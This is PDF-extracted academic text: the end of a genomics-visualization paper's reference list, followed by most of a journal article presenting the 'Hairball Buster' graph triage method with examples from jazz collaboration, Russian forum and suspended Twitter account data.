chromoMap: interactive visualization and mapping of chromosomes. bioRxiv DOI 10.1101/605600. Badouin H, Gouzy J, Grassa CJ, Murat F, Staton SE, Cottret L, Lelandais-Briere C, Owens GL, Carrere S, Mayjonade B, Legrand L, Gill N, Kane NC, Bowers JE, Hubner S, Bellec A, Berard A, Berges H, Blanchet N, Boniface MC, Brunel D, Catrice O, Chaidir N, Claudel C, Donnadieu C, Faraut T, Fievet G, Helmstetter N, King M, Knapp SJ, Lai Z, Le Paslier MC, Lippi Y, Lorenzon L, Mandel JR, Marage G, Marchand G, Marquand E, Bret-Mestries E, Morien E, Nambeesan S, Nguyen T, Pegot-Espagnet P, Pouilly N, Raftis F, Sallet E, Schiex T, Thomas J, Vandecasteele C, Vares D, Vear F, Vautrin S, Crespi M, Mangin B, Burke JM, Salse J, Munos S, Vincourt P, Rieseberg LH, Langlade NB. 2017. The sunflower genome provides insights into oil metabolism, flowering and Asterid evolution. Nature 546:148–152 DOI 10.1038/nature22380. Cao H, Hastie AR, Cao D, Lam ET, Sun Y, Huang H, Liu X, Lin L, Andrews W, Chan S, Huang S, Tong X, Requa M, Anantharaman T, Krogh A, Yang H, Cao H, Xu X. 2014. Rapid detection of structural variation in a human genome us- ing nanochannel-based genome mapping technology. Gigascience 3:Article 34 DOI 10.1186/2047-217X-3-34. Chen J, Hao Z, Guang X, Zhao C, Wang P, Xue L, Zhu Q, Yang L, Sheng Y, Zhou Y, Xu H, Xie H, Long X, Zhang J, Wang Z, Shi M, Lu Y, Liu S, Guan L, Zhu Q, Yang L, Ge S, Cheng T, Laux T, Gao Q, Peng Y, Liu N, Yang S, Shi J. 2019. Liriodendron genome sheds light on angiosperm phylogeny and species-pair differentiation. Nature Plants 5:18–25 DOI 10.1038/s41477-018-0323-6. Dekker J, Rippe K, Dekker M, Kleckner N. 2002. Capturing chromosome conformation. Science 295:1306–1311 DOI 10.1126/science.1067799. Durinck S, Bullard J, Spellman PT, Dudoit S. 2009. GenomeGraphs: integrated genomic data visualization with R. BMC Bioinformatics 10:2 DOI 10.1186/1471-2105-10-2. Eid J, Fehr A, Gray J, Luong K, Lyle J, Otto G, Peluso P, Rank D, Baybayan P, Bettman B, Bibillo A, Bjornson K, Chaudhuri B, Christians F, Cicero R, Clark S, Dalal R, Dewinter A, Dixon J, Foquet M, Gaertner A, Hardenbol P, Heiner C, Hester K, Holden D, Kearns G, Kong X, Kuse R, Lacroix Y, Lin S, Lundquist P, Ma C, Marks P, Maxham M, Murphy D, Park I, Pham T, Phillips M, Roy J, Sebra R, Shen G, Sorenson J, Tomaney A, Travers K, Trulson M, Vieceli J, Wegener J, Wu D, Yang A, Zaccarin D, Zhao P, Zhong F, Korlach J, Turner S. 2009. Real- time DNA sequencing from single polymerase molecules. Science 323:133–138 DOI 10.1126/science.1162986. Hao et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.251 8/11 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.251#supplemental-information http://dx.doi.org/10.7717/peerj-cs.251#supplemental-information http://dx.doi.org/10.1101/605600 http://dx.doi.org/10.1038/nature22380 http://dx.doi.org/10.1186/2047-217X-3-34 http://dx.doi.org/10.1038/s41477-018-0323-6 http://dx.doi.org/10.1126/science.1067799 http://dx.doi.org/10.1186/1471-2105-10-2 http://dx.doi.org/10.1126/science.1162986 http://dx.doi.org/10.7717/peerj-cs.251 Gel B, Serra E. 2017. karyoploteR: an R/Bioconductor package to plot customizable genomes displaying arbitrary data. Bioinformatics 33:3088–3090 DOI 10.1093/bioinformatics/btx346. Hollister JD, Gaut BS. 2009. Epigenetic silencing of transposable elements: a trade- off between reduced transposition and deleterious effects on neighboring gene expression. Genome Research 19:1419–1428 DOI 10.1101/gr.091678.109. Hu L, Xu Z, Wang M, Fan R, Yuan D, Wu B, Wu H, Qin X, Yan L, Tan L, Sim S, Li W, Saski CA, Daniell H, Wendel JF, Lindsey K, Zhang X, Hao C, Jin S. 2019. The chromosome-scale reference genome of black pepper provides insight into piperine biosynthesis. Nature Communications 10:Article 4702 DOI 10.1038/s41467-019-12607-6. Huang H, Liu R, Niu Q, Tang K, Zhang B, Zhang H, Chen K, Zhu JK, Lang Z. 2019. Global increase in DNA methylation during orange fruit development and ripening. Proceedings of the National Academy of Sciences of the United States of America 116:1430–1436 DOI 10.1073/pnas.1815441116. Janecka J, Lysak MA. 2016. chromDraw: an R package for visualization of linear and cir- cular karyotypes. Chromosome Research 24:217–223 DOI 10.1007/s10577-015-9513-5. Jiao WB, Schneeberger K. 2017. The impact of third generation genomic technolo- gies on plant genome assembly. Current Opinion in Plant Biology 36:64–70 DOI 10.1016/j.pbi.2017.02.002. Kin T, Ono Y. 2007. Idiographica: a general-purpose web application to build id- iograms on-demand for human, mouse and rat. Bioinformatics 23:2945–2946 DOI 10.1093/bioinformatics/btm455. Krzywinski M, Schein J, Birol I, Connors J, Gascoyne R, Horsman D, Jones SJ, Marra MA. 2009. Circos: an information aesthetic for comparative genomics. Genome Research 19:1639–1645 DOI 10.1101/gr.092759.109. Laver T, Harrison J, O’Neill PA, Moore K, Farbos A, Paszkiewicz K, Studholme DJ. 2015. Assessing the performance of the Oxford Nanopore Technologies MinION. Biomolecular Detection and Quantification 3:1–8 DOI 10.1016/j.bdq.2015.02.001. Li X, Singh J, Qin M, Li S, Zhang X, Zhang M, Khan A, Zhang S, Wu J. 2019. Devel- opment of an integrated 200K SNP genotyping array and application for genetic mapping, genome assembly improvement and genome wide association studies in pear (Pyrus). Plant Biotechnology Journal 17:1582–1594 DOI 10.1111/pbi.13085. Orostica KY, Verdugo RA. 2016. chromPlot: visualization of genomic data in chromoso- mal context. Bioinformatics 32:2366–2368 DOI 10.1093/bioinformatics/btw137. Pai S, Ren J. 2014. IdeoViz: plots data (continuous/discrete) along chromosomal ideogram. R package version 1.8.0. Parveen A, Khurana S, Kumar A. 2019. Overview of genomic tools for circular visual- ization in the next-generation genomic sequencing era. Current Genomics 20:90–99 DOI 10.2174/1389202920666190314092044. Phillippy AM. 2017. New advances in sequence assembly. Genome Research 27:xi–xiii DOI 10.1101/gr.223057.117. Hao et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.251 9/11 https://peerj.com http://dx.doi.org/10.1093/bioinformatics/btx346 http://dx.doi.org/10.1101/gr.091678.109 http://dx.doi.org/10.1038/s41467-019-12607-6 http://dx.doi.org/10.1073/pnas.1815441116 http://dx.doi.org/10.1007/s10577-015-9513-5 http://dx.doi.org/10.1016/j.pbi.2017.02.002 http://dx.doi.org/10.1093/bioinformatics/btm455 http://dx.doi.org/10.1101/gr.092759.109 http://dx.doi.org/10.1016/j.bdq.2015.02.001 http://dx.doi.org/10.1111/pbi.13085 http://dx.doi.org/10.1093/bioinformatics/btw137 http://dx.doi.org/10.2174/1389202920666190314092044 http://dx.doi.org/10.1101/gr.223057.117 http://dx.doi.org/10.7717/peerj-cs.251 Prlic A. 2017. KaryotypeSVG—SVG based ideograms of chromosomes showing cytogenetic bands. Version 0.2.0. Available at https://github.com/andreasprlic/ karyotypeSVG. R Core Team. 2018. R: a language and environment for statistical computing. Vienna: R Foundation for Statistical Computing. Available at https://www.R-project.org/ . Ross MT, Grafham DV, Coffey AJ, Scherer S, McLay K, Muzny D, Platzer M, Howell GR, Burrows C, Bird CP, Frankish A, Lovell FL, Howe KL, Ashurst JL, Fulton RS, Sudbrak R, Wen GP, Jones MC, Hurles ME, Andrews TD, Scott CE, Searle S, Ramser J, Whittaker A, Deadman R, Carter NP, Hunt SE, Chen R, Cree A, Gunaratne P, Havlak P, Hodgson A, Metzker ML, Richards S, Scott G, Steffen D, Sodergren E, Wheeler DA, Worley KC, Ainscough R, Ambrose KD, Ansari-Lari MA, Aradhya S, Ashwell RIS, Babbage AK, Bagguley CL, Ballabio A, Banerjee R, Barker GE, Barlow KF, Barrett IP, Bates KN, Beare DM, Beasley H, Beasley O, Beck A, Bethel G, Blechschmidt K, Brady N, Bray-Allen S, Bridgeman AM, Brown AJ, Brown MJ, Bonnin D, Bruford EA, Buhay C, Burch P, Burford D, Burgess J, Burrill W, Burton J, Bye JM, Carder C, Carrel L, Chako J, Chapman JC, Chavez D, Chen E, Chen G, Chen Y, Chen ZJ, Chinault C, Ciccodicola A, Clark SY, Clarke G, Clee CM, Clegg S, Clerc-Blankenburg K, Clifford K, Cobley V, Cole CG, Conquer JS, Corby N, Connor RE, David R, Davies J, Davis C, Davis J, Delgado O, DeShazo D, Dhami P, Ding Y, Dinh H, Dodsworth S, Draper H, Dugan-Rocha S, Dunham A, Dunn M, Durbin KJ, Dutta I, Eades T, Ellwood M, Emery-Cohen A, Errington H, Evans KL, Faulkner L, Francis F, Frankland J, Fraser AE, Galgoczy P, Gilbert J, Gill R, Glockner G, Gregory SG, Gribble S, Griffiths C, Grocock R, Gu YH, Gwilliam R, Hamilton C, Hart EA, Hawes A, Heath PD, Heitmann K, Hennig S, Hernandez J, Hinzmann B, Ho S, Hoffs M, Howden PJ, Huckle EJ, Hume J, Hunt PJ, Hunt AR, Isherwood J, Jacob L, Johnson D, Jones S, Jong PJde, Joseph SS, Keenan S, Kelly S, Kershaw JK, Khan Z, Kioschis P, Klages S, Knights AJ, Kosiura A, Kovar-Smith C, Laird GK, Langford C, Lawlor S, Leversha M, Lewis L, Liu W, Lloyd C, Lloyd DM, Loulseged H, Loveland JE, Lovell JD, Lozado R, Lu J, Lyne R, Ma J, Maheshwari M, Matthews LH, McDowall J, McLaren S, McMurray A, Meidl P, Meitinger T, Milne S, Miner G, Mistry SL, Morgan M, Morris S, Muller I, Mullikin JC, Nguyen N, Nordsiek G, Nyakatura G, O’Dell CN, Okwuonu G, Palmer S, Pandian R, Parker D, Parrish J, Pasternak S, Patel D, Pearce AV, Pearson DM, Pelan SE, Perez L, Porter KM, Ramsey Y, Reichwald K, Rhodes S, Ridler KA, Schlessinger D, Schueler MG, Sehra HK, Shaw-Smith C, Shen H, Sheridan EM, Shownkeen R, Skuce CD, Smith ML, Sotheran EC, Steingruber HE, Steward CA, Storey R, Swann RM, Swarbreck D, Tabor PE, Taudien S, Taylor T, Teague B, Thomas K, Thorpe A, Timms K, Tracey A, Trevanion S, Tromans AC, d’Urso M, Verduzco D, Villasana D, Waldron L, Wall M, Wang QY, Warren J, Warry GL, Wei XH, West A, Whitehead SL, Whiteley MN, Wilkinson JE, Willey DL, Williams G, Williams L, Williamson A, Williamson H, Wilming L, Woodmansey RL, Wray PW, Yen J, Zhang JK, Zhou JL, Zoghbi H, Zorilla S, Buck D, Reinhardt R, Poustka A, Rosenthal A, Lehrach H, Meindl A, Minx PJ, Hillier LW, Willard HF, Wilson RK, Waterston RH, Rice CM, Hao et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.251 10/11 https://peerj.com https://github.com/andreasprlic/karyotypeSVG https://github.com/andreasprlic/karyotypeSVG https://www.R-project.org/ http://dx.doi.org/10.7717/peerj-cs.251 Vaudin M, Coulson A, Nelson DL, Weinstock G, Sulston JE, Durbin R, Hubbard T, Gibbs RA, Beck S, Rogers J, Bentley DR. 2005. The DNA sequence of the human X chromosome. Nature 434:325–337 DOI 10.1038/nature03440. Shamimuzzaman M, Vodkin L. 2013. Genome-wide identification of binding sites for NAC and YABBY transcription factors and co-regulated genes during soy- bean seedling development by ChIP-Seq and RNA-Seq. BMC Genomics 14:477 DOI 10.1186/1471-2164-14-477. Tang HB, Wang XY, Bowers JE, Ming R, Alam M, Paterson AH. 2008. Unraveling ancient hexaploidy through multiply-aligned angiosperm gene maps. Genome Research 18:1944–1954 DOI 10.1101/gr.080978.108. Wang M, Tu L, Yuan D, Zhu , Shen C, Li J, Liu F, Pei L, Wang P, Zhao G, Ye Z, Huang H, Yan F, Ma Y, Zhang L, Liu M, You J, Yang Y, Liu Z, Huang F, Li B, Qiu P, Zhang Q, Zhu L, Jin S, Yang X, Min L, Li G, Chen LL, Zheng H, Lindsey K, Lin Z, Udall JA, Zhang X. 2019. Reference genome sequences of two cultivated allotetraploid cottons. Gossypium hirsutum and Gossypium barbadense. Nature Genetics 51:224–229 DOI 10.1038/s41588-018-0282-x. Weitz EM, Pantano L, Zhu J, Upton B, Busby B. 2017. Viewing RNA-seq data on the entire human genome. F1000Res 6:Article 596 DOI 10.12688/f1000research.9762.1. Yin TF, Cook D, Lawrence M. 2012. ggbio: an R package for extending the grammar of graphics for genomic data. Genome Biology 13:R77 DOI 10.1186/gb-2012-13-8-r77. Hao et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.251 11/11 https://peerj.com http://dx.doi.org/10.1038/nature03440 http://dx.doi.org/10.1186/1471-2164-14-477 http://dx.doi.org/10.1101/gr.080978.108 http://dx.doi.org/10.1038/s41588-018-0282-x http://dx.doi.org/10.12688/f1000research.9762.1 http://dx.doi.org/10.1186/gb-2012-13-8-r77 http://dx.doi.org/10.7717/peerj-cs.251 work_5q357hhw75ff3ebwvg7x5x4ssu ---- 1 CONNECTIONS Issue 1 | Vol. 39Article | DOI: 10.21307/connections-2019-009 Hairball Buster: A Graph Triage Method for Viewing and Comparing Graphs Patrick Allen,* Mark Matties and Elisha Peterson Johns Hopkins University Applied Physics Laboratory, Laurel, MD. *E-mail: Patrick.allen@jhuapl.edu Abstract Hairball buster (HB) (also called node-neighbor centrality or NNC) is an approach to graph analytic triage that uses simple calculations and visualization to quickly understand and compare graphs. Rather than displaying highly interconnected graphs as ‘hairballs’ that are difficult to understand, HB provides a simple standard visual representation of a graph and its metrics, combining a monotonically decreasing curve of node metrics with indicators of each node’s neighbors’ metrics. The HB visual is canonical, in the sense that it provides a standard output for each node-link graph. It helps analysts quickly identify areas for further investigation, and also allows for easy comparison between graphs of different data sets. The calculations required for creating an HB display is order M plus N log N, where N is the number of nodes and M is the number of edges. This paper includes examples of the HB approach applied to four real-world data sets. It also compares HB to similar visual approaches such as degree histograms, adjacency matrices, blockmodeling, and force-based layout techniques. HB presents greater information density than other algorithms at lower or equal calculation cost, efficiently presenting information in a single display that is not available in any other single display. Keywords Graph analytic triage, Node-neighbor centrality, Standard canonical form for graphs, Comparing graphs. Purpose and overview The purpose of this paper is to describe a new method for analyzing relationships among nodes in a graph using a canonical representation that also enables comparison between different graphs. The approach is called ‘node-neighbor centrality’ (NNC), or more colloquially, ‘hairball buster’ (HB). HB computes a centrality measure (such as node degree) for a node and its neighbors, and presents this computation in an efficient, standardized visual form that scales to very large graphs. Using the visual depiction of the measure, an analyst can quickly answer questions such as whether the graph is (generally) from a social network or a random graph. Additionally, the depiction retains information about relationships, so an analyst can also quickly determine whether high-degree nodes are connected to each other directly or through a mutually adjacent node, such as in a bipartite graph. This paper presents examples of the HB approach addressing five types of analytic questions using four real-world data sets. HB is a canonical approach using node degrees that allows for comparison of different graphs, while extensions of HB include the display of selected graph attributes such as link weights. The use of alternative measures of centrality is also presented. The approach is compared and contrasted with other common graph algorithms. The paper concludes with the limitations of the HB approach and future planned features and applications. The HB python code is available at https://github. com/PatAllen496/Hairball-Buster. © 2020 Authors. This work is licensed under the Creative Commons Attribution 4.0 License (https://creativecommons.org/licenses/by/4.0/). 2 Hairball Buster: A Graph Triage Method for Viewing and Comparing Graphs The need The most commonly used graph visualization techniques include node-link visualizations that embed a graph’s nodes and links in two-dimensional space, and adjacency matrix visualizations that show the entire space of possible connections in a large matrix. Each of these techniques has a number of advantages and disadvantages (Ghoniem et al., 2005). A particularly challenging case is graphs that have so many elements and interconnected features that it becomes difficult to determine which nodes and links are most ‘important.’ When using standard graph visualization algorithms such as force-directed (Kamada and Kawai, 1989; Fruchterman and Reingold, 1991) or dimensional reduction, the usual starting point is a depiction of all nodes and links. For many kinds of graphs, especially those with high connectivity, this results in a ‘hairball’ as shown in Figure 1, which shows a link between every pair of jazz musicians that have performed together (Gleiser and Danon, 2003). The purpose of graph visualization is to help an analyst understand features of the graph or a particular node, using visual queries (Freeman, 2000; Peterson, 2011; Ware, 2010). However, in this typical ‘hairball,’ it is difficult to determine at a glance the nodes with the highest degree, the distribution of nodes by degree, and whether the highest degree nodes are directly connected to each other. An analyst needs to apply a range of other algorithms to further dissect the graph, sometimes requiring multiple iterations, to determine how the various nodes relate to each other. In addition, there are a number of additional challenges that arise when visualizing graphs that change over time (Bender-deMoll and McFarland, 2006; Peterson, 2011). There is a tendency in force-directed visualization for nodes and links to reposition themselves, every time new nodes or links are added or removed. This makes it difficult not only to identify key nodes, but to track them over time. A number of approaches have been suggested, but they do not fully address the issue and are computationally expensive (Bender-deMoll and McFarland, 2006; Brandes and Corman, 2003; Moody et al., 2005; Peterson, 2011; Zweig, 2016). An alternative approach is the backbone layout, which attempts to directly resolve difficulties in visualizing particularly dense portions of a force- directed layout (Lehmann and Kottler, 2007, Nocaj et al., 2014, 2015). Figure 2 shows the same data set using Visone’s Quadrilateral Simmelian backbone layout. While the big hairball of Figure 1 has been broken up into four clusters, one large hairball has turned into several smaller hairballs. One still cannot answer many questions of interest to a data analyst, e.g. which nodes have the highest degree or how nodes of high degree are connected to each other. There is also an inherent performance cost when generating force-directed graph displays, most of which are at a minimum order N2, where N is the number of nodes (Fruchterman and Reingold, 1991). Because of the challenges in visualizing node- link diagrams in these cases, alternatives, such as an adjacency matrix visualization, are often proposed (Sheny and Maz, 2007). Adjacency matrices also can be a very effective way to visualize clusters, so they are often used when studying communities, sometimes referred to as clustering or blockmodeling (Wasserman and Faust, 1994; White et al., 1976). In one study, the authors found that the adjacency matrix is almost always superior for a certain set of tasks to the node- link diagram (Ghoniem et al., 2005). However, the authors did not include any graphs with more than 100 nodes in their study, and this is the principle drawback of adjacency matrix visualizations: they do not scale well to graphs with thousands or millions of nodes. HB approach HB is a new way of looking at graph data that scales effectively to large, dense graphs. The approach is simple to calculate and plot, and provides an easy way to identify by inspection the most connected nodes and most important links in the graph. Assume there is a graph with N nodes and M links. The degree of each node is the number of links connected to that node. (Throughout this paper, we will use degree as our primary measure of centrality, Figure 1: Sample ‘Hairball’ showing jazz players that performed with each other. 3 CONNECTIONS although HB representations of other centrality measures are presented later.) There are six steps to creating the HB plot as follows: 1. Calculate the centrality (degree) of each node (which requires M calculations). 2. Sort the nodes by degree, assigning ranks from 1 (the highest degree node) to N (which requires N log N calculations). 3. Plot (in one color) the monotonically decreas- ing curve of degree (vertical axis) vs. node rank (horizontal axis). (There will be N points on this curve, one for each node.) Call this ‘the curve’ and the nodes on it ‘curve nodes.’ 4. Calculate the neighbors of each node and place each neighbor on a list associated with each ranked node. (The placement of the neighbor on the list of neighbors for each node is accomplished during the initial M calcula- tions in Step 1.) 5. Store the degree of the neighbor with the neighbor node. (This step uses an index for each node so that the degree of the neighbor is an indexed look-up.) 6. For each node, plot (in another color) the value of each of its neighbor’s degrees on the verti- cal line at the same horizontal position as that node, so that each of its neighbors will be rep- resented above or below that node’s position on the curve. Call these the ‘neighbor nodes.’ Optional calculations, such as ensuring canonicalization and parallelization, and display options for log–log, semi–log, inverse, and same degree offsets, are pre- sented in Section ‘optional steps of the HB algorithm.’ The computational efficiency of HB is on the order of M + N Log N. In contrast, traditional graph displays that look like the hairball shown in Figure 1 require order N2 (Fruchterman and Reingold, 1991). In addition, some algorithms only sample the graph data set, while the HB approach deals with the whole data set in one pass (Squartini et al., 2015). See Section ‘HB measures of performance’ for further details. In addition to computational efficiency, HB uses visual space more efficiently than an adjacency matrix, making it suitable for graphs of any size. It supports many of the same visual queries as an adjacency matrix, with the additional advantage that it can highlight not just a node’s neighbors or clusters, but also how a node’s centrality measure relates to those of its neighbors. In the remainder of this paper, these advantages are described in more detail by analyzing several real-world sample graphs. First application: quickly identifying key nodes and relationships in a graph This section uses the jazz data set to illustrate how HB can answer common analytic questions about Figure 2: Visone backbone layout of jazz player data set. 4 Hairball Buster: A Graph Triage Method for Viewing and Comparing Graphs which nodes have the highest degree and how these are connected to other types of nodes. Figure 3 depicts the degree curve (Step 3, above). Note that there are four very high-degree nodes in the upper-left-hand corner. The rest of the nodes follow a fairly linear path from upper left to lower right. (This pattern is typical for social networks.) Figure 4 displays the neighbors of the curve nodes (Steps 4, 5, and 6 above). Each red dot represents one or more links on a traditional graph display. The dot’s vertical position indicates the node at one end of the link and its horizontal position indicates the node at the other end. For example, the red dot at coordinate (2,100) is the link between Figure 3: Sample HB curve for jazz players that performed with each other. Figure 4: Neighbors plot for jazz players that performed with each other. 5 CONNECTIONS the first and second nodes on the curve (first two blue dots). This curve is not quite the same as a histogram or node-degree distribution, where one dot represents many nodes of the same degree. As with node- degree curves, the shape can be useful for comparing different graphs. However, HB displays one dot for each node, since the horizontal axis is the degree rank of the node. This is an important distinction, because HB retains connectivity information about individual nodes that other techniques do not and can therefore answer a much broader class of questions. It can also address additional questions that an adjacency matrix cannot, as will be summarized later. Unlike the backbone layout display, the HB chart clearly shows which nodes have highest degree, how much higher their degree is than other nodes, whether the highest degree nodes are directly or indirectly connected to other high-degree nodes, and how high- degree nodes tend to connect to low-degree nodes. This is summarized in Figure 5. For instance, using the HB visual for jazz players in Figure 4, the top 8 nodes are all clearly connected to each other (forming a fully connected subgraph), since there is a red dot on the same row and column as the three blue dots representing the eight highest degree nodes on the curve. For example, the highest degree node (rank 1, degree 100) is connected to the second highest ranked node (rank 2, degree 96), indicated by the red dots plotted at rank 1/degree 96 and rank 2/degree 100. This pattern continues with the remainder of the top 8 nodes. This specific kind of connectivity information cannot be determined from a backbone or a histogram display. Second, the highest degree jazz players rarely performed with the lowest-degree jazz players, as shown by the gaps in the far side of the upper right quadrant, which increase in frequency and length as the rank increases to the right. This means that the number of lower-ranked musicians with whom the most connected musician performed is small. Third, there are few dots near the bottom of the chart. This shows that jazz players who have performed with many others have tended to perform with other jazz players who have also performed with many others, and not with those who have performed with few. In general, the upper-left ‘quadrant’ or section of Figure 5 shows which high-degree nodes are mutually connected to other high-degree nodes. If some of the highest degree nodes are not connected with each other, this can indicate that there are different clusters of nodes around some of the high- degree nodes (an observation that can be made without running a clustering algorithm). Conversely, if the highest degree nodes are mostly directly connected to each other, this provides a different pattern around a core group to analyze further. In the upper right and lower left quadrants, it is easy to see which high-degree nodes connect with lower-degree nodes and which do not. A high-degree node with many connections to one-degree nodes indicates a common star pattern on traditional graph displays. However, if one finds the highest degree nodes are connected to low-degree nodes rather than each other, then one may have a bipartite graph or other distinguishing feature. The lower right quadrant shows which lower- degree nodes connect with each other. If this area is sparse or empty, then the lower-degree nodes are only connecting with the higher-degree nodes. This is indicative of a star-like shape for some of the high- degree nodes. The visual can also be used to find nodes that are indirectly connected via an intermediate node. If two nodes A and B have a common neighbor C, then C will be depicted as a neighbor node on the same horizontal line above or below each of A and B. Figure 6 shows how the HB chart can appear for a directed graph. In this example, we randomly assigned a direction to the Jazz player data set, where green indicates an ‘in’ link to the node in that row, while red indicates an ‘out’ link. The Jazz player data set consisted of undirected links, and this figure just shows how directed graphs would appear if the links were directed. Second application: quickly identifying core groups or multiple groups This section shows how HB can quickly determine whether there is a single core group or multiple core groups in a data set. This example uses Toaster Figure 5: Questions addressed by location of neighbor nodes. 6 Hairball Buster: A Graph Triage Method for Viewing and Comparing Graphs Figure 6: Sample directed neighbors plot for jazz player data set (Green = In, Red = Out). (Toster dot ru), which is a Russian social media site for software support and help from a community of subject matter experts (SMEs). It is similar to the popular StackOverflow site, but the Toaster data set is smaller and provides a form of ground truth in terms of user-provided tags for purposes of comparison. The Toaster data have a set of threaded discussions where a person posts a question, someone else posts an answer (usually an SME), and then others can comment on both the question and the answer. The data set at the time of download had over 30,000 nodes, 3,865,650 edges, and over 14,000 discussions. Initial work by others at APL examined how to find Figure 7: Force-directed representation of the Toaster data set. sub-communities within the larger community represented by the Toaster data set. See Figure 7 for a traditional force-directed visualization of the Toaster data set. This image definitely qualifies as a hairball! As shown in Figure 8, the backbone layout did not produce more informative results. To apply the HB approach to this data set, we first removed duplications and focused entirely on whether any username in the data set communicated with any other username in the data set. The analytic question we are asking is ‘Who are the core members, and are there any large communities with unique core members?’ While the original data set had 30,000 nodes and almost 4 million edges, the de-duped data set had 23,916 nodes and 75,050 edges. Figure 9 shows the HB representation of the nearly 24,000 nodes. Focusing on the highest-ranked nodes, the top 28 can be readily identified, while the remaining are difficult to visually distinguish. Each of the top-ranked nodes appears to connect to all the other high-ranked nodes, and the first obvious visual gaps occur at around 1,000 nodes. This indicates that the top-ranked nodes are either fully connected or very nearly fully connected. While displaying the full data set provides the information described above for the first 28 nodes, it does not definitively indicate whether the highest degree nodes are fully connected, or whether they belong to separate clusters due to visual occlusion. To address this limitation, it helps to view the ‘inverse’ of the neighbors – that is, to display the 7 CONNECTIONS Figure 8: Backbone layout representation of the Toaster data set. Figure 9: HB representation of the Toaster data set (directionality ignored). missing links (the gaps), and to zoom in on the top nodes. (Zooming in on the display adds no additional computational penalty beyond rendering.) When there are no dots in the inverse, the graph is fully connected. Figure 10 shows this inverse display zoomed in on the first 250 nodes. It appears that the top 20 nodes are almost, but not quite, fully connected. Figure 11 zooms in further on just the top 20 nodes, again showing the ‘inverse’ neighbors. It is clear that nodes 1 through 15 are fully connected and that nodes 1 through 20 are almost fully connected. 8 Hairball Buster: A Graph Triage Method for Viewing and Comparing Graphs Figure 10: HB representation of the inverse of neighbor nodes (e.g. gaps). Figure 11: HB inverse representation of just the top 100 ranked nodes with each other in Toaster data set. Note that zooming in on the inverse neighbors was a simple way to gain a more definitive understanding of the graph while incurring virtually no additional computational cost. In summary, using our triage approach based on HB, we can quickly see that the top-ranked 15 SMEs in the Toaster data set have all commented on, or been commented on, by each other, and the top 20 nearly so. This means that there is likely to be just one core group in the Toaster community all connected with each other. In contrast, it takes more than one algorithm and manual steps to provide similar data. For example, we ran a histogram on the Toaster data set, which 9 CONNECTIONS While k-truss is not available in Gephi, it is useful in identifying clusters in data sets. However, when the top nodes are fully or nearly fully connected, the k-truss algorithm will not provide additional useful information about these nodes. Third application: HB and temporal graphs A significant benefit of the HB chart approach is that the canonical format allows multiple curves/ graphs to be compared at once. As an example, we divided the Toaster data set into blocks of 3,500 connections representing approximate slices of the data set over time (since the initial data set was in roughly chronological order). We then compared the HB depictions of the first 3,500 node connections with the second and third blocks. Figures 13 to 15 show these three batches of nodes and links plotted with the same axis scales for ease of comparison. In Figure 13, there is one node above degree 180, which is a much higher degree than any of the other nodes. The next highest node is around 110, followed by a couple at 70 and then a fairly smooth curve toward the lowest degrees. Figure 14 shows that in this next time period, the 110-degree node is the highest-ranked node and the 70-degree nodes are still present, but there is also an interesting bump in the curve around degree 20. Figure 15 also has a Figure 12: Force Atlas 2 on top 20 nodes in Toaster data set. identified the top 25 to 30 nodes as having the highest degree. We then ran Gephi, ranking the nodes by degree and manually copied the top 20 nodes to visualize using Force Atlas 2. Figure 12 shows the results using degree as the node label. While the process took roughly 5 min, HB provided the results in 1 sec for the initial display and then for the inverse display. The Gephi example does show highly connected nodes, but does not conclusively show which are fully connected, and required greater time and calculation cost than HB. Figure 13: HB chart of first 3,500 connections in Toaster data set. 10 Hairball Buster: A Graph Triage Method for Viewing and Comparing Graphs Figure 15: HB chart of third 3,500 connections in Toaster data set. Figure 14: HB chart of second 3,500 connections in Toaster data set. maximum degree node at 110, but also one at 90, 80, and 60. This third set of 3,500 connections also has a ‘bump’ in the curve around degree 20 that is similar to the bump in Figure 14. In typical node-link visualizations, visualizing changing graphs compounds many of the issues associated with visualizing static graphs. In addition, there are new forms of ‘visual noise’: nodes/edges that are displayed or removed without warning, and nodes/edges that move rapidly from one time period to the next without warning (Peterson, 2011). Many approaches have been suggested to address these 11 CONNECTIONS issues, but they are computationally expensive and only work well in limited cases (Bender-deMoll and McFarland, 2006; Brandes and Corman, 2003; Moody et al., 2005; Peterson, 2011; Zweig, 2016). In contrast, the HB approach is computationally inexpensive and high in information content. HB does not address all of these issues, but allows the analyst to focus on how the centrality of a specific node changes over time, or how the distribution of centrality changes over time. For example, does the shape of the curve change over time? This is shown in Figures 13 to 15 for the Toaster data set. Does the rank of each node change over time? This can be added in a later version of the HB code. See Section ‘future features and applications of HB’ for such an approach. Fourth application: identifying anomalous features This section describes how HB can be used to quickly identify selected anomalous features in a data set associated with the highest degree nodes, using suspended Iranian Twitter™ accounts obtained from https://about.twitter.com/en_us/values/elections- integrity.html#data (Twitter™, 2018). This data set for user-id replies with no retweets between nodes included 228,626 nodes and 440,244 edges. Figure 16 was calculated in about 40 sec on a single- threaded laptop, and shows that one node dominated with over 260,000 replies. The next two highest nodes had around 90,000 replies and just under 30,000 replies, respectively. (Displaying over 200,000 nodes and 400,000 links would not be feasible in an adjacency matrix. See Section ‘comparing HB to other algorithms’ for comparisons to both the adjacency matrix and blockmodeling.) Figure 16 shows how much larger the degree of highest node is compared to all other nodes, as well as for the second and third degree nodes. More importantly, this figure shows an interesting pattern in gaps in the reply pattern of these top 3 nodes, as well as the highest of the next lower- degree-ranked nodes. For example, the highest degree mode appears to connect with most of the rest of the nodes except around nodes ranked at 160K, while the second highest degree node has multiple gaps and the third highest degree node does not appear to connect with about half the nodes. Zooming in on the left-hand side, Figure 17 shows the same data limited to the first 200 nodes. Note that the three top-ranked nodes connected with each other and many other nodes, but did not connect with the next 40 highest-ranked nodes except in one case. What is the reason for such an unusual pattern? The authors do not know for sure, but it may be that nodes 4 through 44 are bots run by a different team than those running the first three nodes. (Of the 4th through 44th nodes, the 4th node communicated with most of the other 43 nodes, but most of the rest of the 43 nodes did not communicate with each Figure 16: HB chart of suspended Iranian Twitter™ accounts, user-id replies, and no retweets. 12 Hairball Buster: A Graph Triage Method for Viewing and Comparing Graphs other.) In any case, HB is an efficient way to quickly identify areas of interest and further investigation into anomalous data without having to slowly whittle down a huge hairball display. This approach might also be useful in helping identify other Twitter™ bots in the future based on similar patterns. Fifth application: quickly identify nodes connected by highest-value 